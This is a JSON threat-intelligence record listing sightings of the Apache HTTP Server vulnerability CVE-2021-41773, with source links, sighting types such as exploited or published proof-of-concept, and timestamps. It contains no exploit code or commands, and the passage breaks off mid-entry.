{"vulnerability": "CVE-2021-41773", "sightings": [{"uuid": "20e2869a-a0d3-4362-a797-0e42cc89b904", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "seen", "source": "MISP/f5030aca-7d5a-43a4-ae03-8f4ac8e85422", "content": "", "creation_timestamp": "2021-11-08T08:58:16.000000Z"}, {"uuid": "a6d3e10e-8f97-48a0-91cd-9b9502cbacc0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2021-11-20T09:53:52.000000Z"}, {"uuid": "ac7265d6-d2a2-4a2e-9aa0-b60e1e1535e6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "seen", "source": "MISP/63ddead6-4b82-414c-ad8e-c516b950b446", "content": "", "creation_timestamp": "2021-10-25T22:32:13.000000Z"}, {"uuid": "444560e5-7f99-4ab4-bcce-4967f00a1a5b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "seen", "source": "MISP/c16a712c-522a-45ec-91d4-9f2ce31918e6", "content": "", "creation_timestamp": "2021-10-21T14:09:20.000000Z"}, {"uuid": "aca0a49e-2c4d-4382-9dc1-baf2e38116f5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "seen", "source": "MISP/8bf50bb8-94dd-4004-a646-5f78db6f0b6a", "content": "", "creation_timestamp": "2022-07-14T13:36:27.000000Z"}, {"uuid": "18bdbc12-90de-4704-8230-e1257cdf904b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "seen", "source": "MISP/4d74089b-ad9f-4269-b1e0-21cba36a3daf", "content": "", "creation_timestamp": "2024-07-17T14:20:20.000000Z"}, {"uuid": "d057923b-cd80-45bc-bc8b-ac1ca26638b2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "confirmed", "source": "https://github.com/projectdiscovery/nuclei-templates/tree/main/http/cves/2021/CVE-2021-41773.yaml", "content": "", "creation_timestamp": "2023-04-27T09:58:59.000000Z"}, {"uuid": "223792d1-e04c-4bae-9464-d8467cdefaf4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "exploited", "source": "https://www.exploit-db.com/exploits/50512", "content": "", "creation_timestamp": "2021-11-11T00:00:00.000000Z"}, {"uuid": "f4347adf-d367-4f3e-b039-64f02825f172", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "exploited", "source": "https://www.exploit-db.com/exploits/50383", "content": "", "creation_timestamp": "2021-10-06T00:00:00.000000Z"}, {"uuid": "5f698996-8fad-4fea-ab2a-c1aba50a66b6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "seen", "source": "https://feedsin.space/feed/CISAKevBot/items/2971157", "content": "", "creation_timestamp": "2024-12-24T20:25:06.402210Z"}, {"uuid": "6664dffb-94de-46cd-8a2d-fadb7e505bf7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "seen", "source": "https://feedsin.space/feed/CISAKevBot/items/2971156", "content": "", "creation_timestamp": "2024-12-24T20:25:05.371081Z"}, {"uuid": "1304a6a0-70c4-48a6-9e36-b9e9be81337e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "seen", "source": "https://bsky.app/profile/kyosuke-tanaka.bsky.social/post/3lgaif5pahc2m", "content": "", "creation_timestamp": "2025-01-21T08:58:57.047855Z"}, {"uuid": "3293e6b6-aed1-475d-bf03-9831b65fb302", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-06T03:13:45.000000Z"}, {"uuid": "e55cad6b-4bbc-4ea5-8997-fd94b872012d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-23T04:10:40.000000Z"}, {"uuid": "734641b9-46a6-4ef0-84a4-c39e5b3a9525", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "seen", "source": "https://bsky.app/profile/crowdsec.bsky.social/post/3lnn2cncbsk2j", "content": "", "creation_timestamp": "2025-04-25T10:48:06.610754Z"}, {"uuid": "219c5d18-9d02-4f7b-a551-674ec32f6561", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2025-02-23T02:09:58.000000Z"}, {"uuid": "b7bf4034-e2c4-4d45-98e6-9bc01af14ed0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "seen", "source": "https://bsky.app/profile/crowdsec.bsky.social/post/3lnn2covx4s2j", "content": "", "creation_timestamp": "2025-04-25T10:48:07.196254Z"}, {"uuid": "c402a596-50aa-4a3c-bec6-2f8ab23238c3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "seen", "source": "https://bsky.app/profile/crowdsec.bsky.social/post/3lnn2covy422j", "content": "", "creation_timestamp": "2025-04-25T10:48:07.790617Z"}, {"uuid": "908797e0-9d35-4750-af21-43099149f845", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "seen", "source": "https://bsky.app/profile/crowdsec.bsky.social/post/3lnn2covz3c2j", "content": "", "creation_timestamp": "2025-04-25T10:48:08.379070Z"}, {"uuid": "2c6da71c-4f59-4f92-8f17-492bb2f2724a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "seen", "source": "https://bsky.app/profile/crowdsec.bsky.social/post/3lnn2cow22k2j", "content": "", "creation_timestamp": "2025-04-25T10:48:08.951004Z"}, {"uuid": "bc5ce280-6cb8-4c50-bad3-fefe0d6853c3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "seen", "source": "https://bsky.app/profile/crowdsec.bsky.social/post/3lnn2cow2zs2j", "content": "", "creation_timestamp": "2025-04-25T10:48:09.528804Z"}, {"uuid": "6c4cd5a8-a9a4-4567-8873-fa733da2655a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "seen", "source": "https://bsky.app/profile/crowdsec.bsky.social/post/3lnn2cow2zt2j", "content": "", "creation_timestamp": "2025-04-25T10:48:10.095211Z"}, {"uuid": "8c53d801-b969-4395-8351-ac0d8fa5eab4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "seen", "source": "https://bsky.app/profile/crowdsec.bsky.social/post/3lnn2cow3z32j", "content": "", "creation_timestamp": "2025-04-25T10:48:10.701275Z"}, {"uuid": "e6e02670-2933-41d5-a3d6-3c7c36e3e487", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "seen", "source": "https://bsky.app/profile/crowdsec.bsky.social/post/3lnn2cqb7vd2j", "content": "", "creation_timestamp": "2025-04-25T10:48:11.317841Z"}, {"uuid": "bdf6e417-5a12-4bc1-9eb8-609dc935557a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "seen", "source": "https://gist.github.com/jeraldjunkmail/f5f7e892deeac00d0236e951179290bb", "content": "", "creation_timestamp": "2025-06-11T18:42:27.000000Z"}, {"uuid": "479dd72e-4630-4bfc-8598-8337f8eb08a5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "seen", "source": "https://gist.github.com/jeraldjunkmail/298bc513f77c5c29206139eda2a7d067", "content": "", "creation_timestamp": "2025-06-11T18:41:38.000000Z"}, {"uuid": "29c744ee-01d6-43a1-9b05-6d5db89040c4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "seen", "source": "https://infosec.exchange/users/dragonjar/statuses/114873912181744321", "content": "", "creation_timestamp": "2025-07-18T11:06:37.243418Z"}, {"uuid": "f5a54cf1-dab9-469a-a485-9f72644dfeaf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "seen", "source": "https://bsky.app/profile/nimblenerd.social/post/3lu64zvxalq26", "content": "", "creation_timestamp": "2025-07-17T14:23:12.112191Z"}, {"uuid": "7f7b06cf-edb7-446d-8572-0dcaa7d98eca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "seen", "source": "https://thehackernews.com/2025/07/hackers-exploit-apache-http-server-flaw.html", "content": "", "creation_timestamp": "2025-07-17T12:11:00.000000Z"}, {"uuid": "207e84b3-732c-4813-8183-47af021ae9fb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "seen", "source": "https://bsky.app/profile/ytroncal.bsky.social/post/3lu7lgwx5lc2w", "content": "", "creation_timestamp": "2025-07-18T04:13:43.881353Z"}, {"uuid": "239294f5-c9df-496a-8221-530887f66d6b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "seen", "source": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/http/apache_normalize_path.rb", "content": "", "creation_timestamp": "2021-10-22T16:59:35.000000Z"}, {"uuid": "658f5299-296a-4e79-ad0a-4761db202da8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2021-41773", "type": "seen", "source": "https://gist.github.com/prabhatverma47/10282d7b358ebfa7023be18f979b20a3", "content": "", "creation_timestamp": "2025-07-26T18:34:48.000000Z"}, {"uuid": "bd330127-fbf0-421c-bfc9-45f97d72322b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "seen", "source": "MISP/a41d8549-5384-5e1a-8c33-bf88e35b5a0a", "content": "", "creation_timestamp": "2025-10-14T10:31:57.000000Z"}, {"uuid": "c9fc0a15-42d1-4ceb-8604-e2e0340eb8d6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "seen", "source": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/apache_normalize_path_rce.rb", "content": "", "creation_timestamp": "2021-10-22T16:59:35.000000Z"}, {"uuid": "78f467b3-c186-4277-b3cc-b54507a5751a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "seen", "source": "MISP/ab0b745f-bbd5-338e-8b92-97dd0c757e9d", "content": "", "creation_timestamp": "2025-08-31T03:01:06.000000Z"}, {"uuid": "10432167-4f24-4e93-a15c-dfbb2eaf83f6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "seen", "source": "https://gist.github.com/NidTamil/0d98fdbe48c77aefb835ef97bef4eb94", "content": "", "creation_timestamp": "2025-12-07T07:41:58.000000Z"}, {"uuid": "12f09d29-8508-44d5-b840-b82f1f45ef19", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2021-41773", "type": "seen", "source": "https://gist.github.com/TomaszFrejnik/2f20c53778d48b6931abf358f7b8bde3", "content": "", "creation_timestamp": "2026-02-09T14:45:48.000000Z"}, {"uuid": "8be3226d-6fc4-464b-9798-0005cb8e4dc2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "seen", "source": "https://gist.github.com/aw-junaid/ae4d93f4a6b7d5e657e92315bcfa005c", "content": "", "creation_timestamp": "2026-02-21T18:37:39.000000Z"}, {"uuid": "a9398981-29c8-4b55-aa1b-f2798ffda99b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "seen", "source": "https://gist.github.com/winterswang/4908fd900e5f5a047bafb32001894038", "content": "", "creation_timestamp": "2026-03-11T04:03:33.000000Z"}, {"uuid": "2869760a-1522-49c0-acc1-7396cebb8be4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2021-41773", "type": "seen", "source": "https://www.govcert.gov.hk/en/alerts_detail.php?id=664", "content": "", "creation_timestamp": "2021-10-06T04:00:00.000000Z"}, {"uuid": "81d424b2-8b52-4e22-a326-c56ce97ad51b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2021-41773", "type": "seen", "source": "https://www.kyberturvallisuuskeskus.fi/fi/haavoittuvuus_30/2021", "content": "", "creation_timestamp": "2021-10-06T07:52:42.000000Z"}, {"uuid": "5d387c26-b67f-406e-b9f1-bb1d758bee63", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "c933734a-9be8-4142-889e-26e95c752803", "vulnerability": "CVE-2021-41773", "type": "seen", "source": "https://vulnerability.circl.lu/bundle/92582bf5-d92c-47fe-b891-656d271bbfef", "content": "", "creation_timestamp": "2024-10-14T15:50:35.983245Z"}, {"uuid": "b9a2de18-4907-4c91-b7be-f9b458963c2b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "seen", "source": "https://gist.github.com/alon710/9f684373b84a67aab5ed4cb785cef768", "content": "", "creation_timestamp": "2026-01-24T21:26:59.000000Z"}, {"uuid": "7294f3e9-597c-4460-a42c-80eecc0fb8ee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "seen", "source": "https://gist.github.com/alon710/1ea3b6a49fa83d13b38c9c6bc3b7c20c", "content": "", "creation_timestamp": "2026-01-24T21:26:28.000000Z"}, {"uuid": "e6363005-6d01-46c6-81c7-ce1283c6e32e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "seen", "source": "https://gist.github.com/alon710/62fd8699994eeaeddf766631617c0993", "content": "", "creation_timestamp": "2026-01-24T22:41:50.000000Z"}, {"uuid": "bdec72fd-8524-45b5-ae65-62ab91119835", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "seen", "source": "https://gist.github.com/alon710/252dc8cfac5b97420e6dd2fa2fa69f7a", "content": "", "creation_timestamp": "2026-01-24T22:42:20.000000Z"}, {"uuid": "c71787b0-d656-4573-86bd-344bebec3fbf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "af0120d0-3dac-4a6a-974b-a9f33d2a9846", "vulnerability": "CVE-2021-41773", "type": "exploited", "source": "https://vulnerability.circl.lu/known-exploited-vulnerabilities-catalog/20ac44ce-0563-4169-8459-dbabc602a92d", "content": "", "creation_timestamp": "2026-02-02T12:28:35.077470Z"}, {"uuid": "2aad6e42-95ed-4efe-9464-d7b6f7b56558", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "seen", "source": "https://gist.github.com/alon710/55414f10a9656d4d61dfbf21c7674f36", "content": "", "creation_timestamp": "2026-01-24T22:43:14.000000Z"}, {"uuid": "4db1035c-b2ee-4dc6-857f-f2c48799b634", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/12289", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aRCE\n\u63cf\u8ff0\uff1aThis repository contains a Proof-of-Concept for the CVE-2021-41773. This CVE contains a LFI and RCE vulnerablity.\nURL\uff1ahttps://github.com/tiemio/SSH-key-and-RCE-PoC-for-CVE-2021-41773\n\n\u6807\u7b7e\uff1a#RCE", "creation_timestamp": "2025-02-02T20:37:47.000000Z"}, {"uuid": "4fb30149-8fa6-47a4-accc-58396861b859", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/681", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aApache (Linux) CVE-2021-41773/2021-42013 Mass Vulnerability Checker\nURL\uff1ahttps://github.com/im-hanzou/apachrot", "creation_timestamp": "2021-10-12T07:24:10.000000Z"}, {"uuid": "2122a2d1-8ed4-4b86-a0b6-672cad1d9351", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "Telegram/6x7nwna-vtQ089AZvELTDYHncFwQR8bSc4xo9Mu5UunXTzE", "content": "", "creation_timestamp": "2025-11-26T15:00:08.000000Z"}, {"uuid": "bc61339e-791c-4eb0-880c-5b318a63d045", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/672", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aMetasploit-Framework modules (scanner and exploit) for the CVE-2021-41773 and CVE-2021-42013 (Path Traversal in Apache 2.4.49/2.4.50)\nURL\uff1ahttps://github.com/Zeop-CyberSec/apache_normalize_path", "creation_timestamp": "2021-10-10T12:51:09.000000Z"}, {"uuid": "0a007a24-bcec-4f92-b068-481972e5522b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/698", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aapache httpd path traversal checker(CVE-2021-41773 / CVE-2021-42013)\nURL\uff1ahttps://github.com/theLSA/apache-httpd-path-traversal-checker", "creation_timestamp": "2021-10-15T10:40:38.000000Z"}, {"uuid": "a833c854-f8dc-4ebd-8202-527ef5de3089", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/697", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aTool check: CVE-2021-41773, CVE-2021-42013, CVE-2020-17519\nURL\uff1ahttps://github.com/MrCl0wnLab/SimplesApachePathTraversal", "creation_timestamp": "2021-10-14T21:14:51.000000Z"}, {"uuid": "8227f1ed-b1b5-46fd-aa4c-2d9c117c9334", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/703", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aSimple honeypot for CVE-2021-41773 vulnerability\nURL\uff1ahttps://github.com/lopqto/CVE-2021-41773_Honeypot", "creation_timestamp": "2021-10-16T15:32:47.000000Z"}, {"uuid": "2a2fea24-9dda-44f7-9c74-b16054ef1d5b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/700", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aCVE-2021-41773-PoC\nURL\uff1ahttps://github.com/anonsecteaminc/CVE-2021-41773-PoC", "creation_timestamp": "2021-10-16T01:40:35.000000Z"}, {"uuid": "1706824a-cabb-4185-93d9-9e51d28009e8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/699", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aThe first vulnerability with the CVE identifier CVE-2021-41773 is a path traversal flaw that exists in Apache HTTP Server 2.4.49.\nURL\uff1ahttps://github.com/LudovicPatho/CVE-2021-41773", "creation_timestamp": "2021-10-15T21:44:12.000000Z"}, {"uuid": "f5b3889e-ed0d-4b21-9a92-77d024702f0a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/670", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aCVE-2021-41773: Path Traversal Zero-Day in Apache HTTP Server Exploited\nURL\uff1ahttps://github.com/twseptian/CVE-2021-41773", "creation_timestamp": "2021-10-10T05:23:18.000000Z"}, {"uuid": "381de5a3-2108-4a09-bd38-95998e861b93", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/663", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aCVE-2021-41773 \u7684\u590d\u73b0\nURL\uff1ahttps://github.com/1nhann/CVE-2021-41773", "creation_timestamp": "2021-10-06T14:19:15.000000Z"}, {"uuid": "dc9c4dc0-7d7c-45d3-8f7b-418e887dd517", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/654", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aCVE-2021-41773.nse\nURL\uff1ahttps://github.com/creadpag/cve-2021-41773-nse", "creation_timestamp": "2021-10-06T05:14:37.000000Z"}, {"uuid": "ee09e5af-5067-45da-bcff-0a6767d6b408", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/653", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aPoC for CVE-2021-41773 with docker to demonstrate\nURL\uff1ahttps://github.com/habibiefaried/CVE-2021-41773-PoC", "creation_timestamp": "2021-10-06T03:03:23.000000Z"}, {"uuid": "281173b9-ec2b-4993-a6ff-e31f8780ebf5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/652", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aCVE-2021-41773 POC with Docker\nURL\uff1ahttps://github.com/itsecurityco/CVE-2021-41773", "creation_timestamp": "2021-10-06T02:33:42.000000Z"}, {"uuid": "2395325c-9755-4e38-bdc1-ecbf7456e512", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/662", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aPath traversal and file disclosure vulnerability in Apache HTTP Server 2.4.49 (CVE-2021-41773)\nURL\uff1ahttps://github.com/jbovet/CVE-2021-41773", "creation_timestamp": 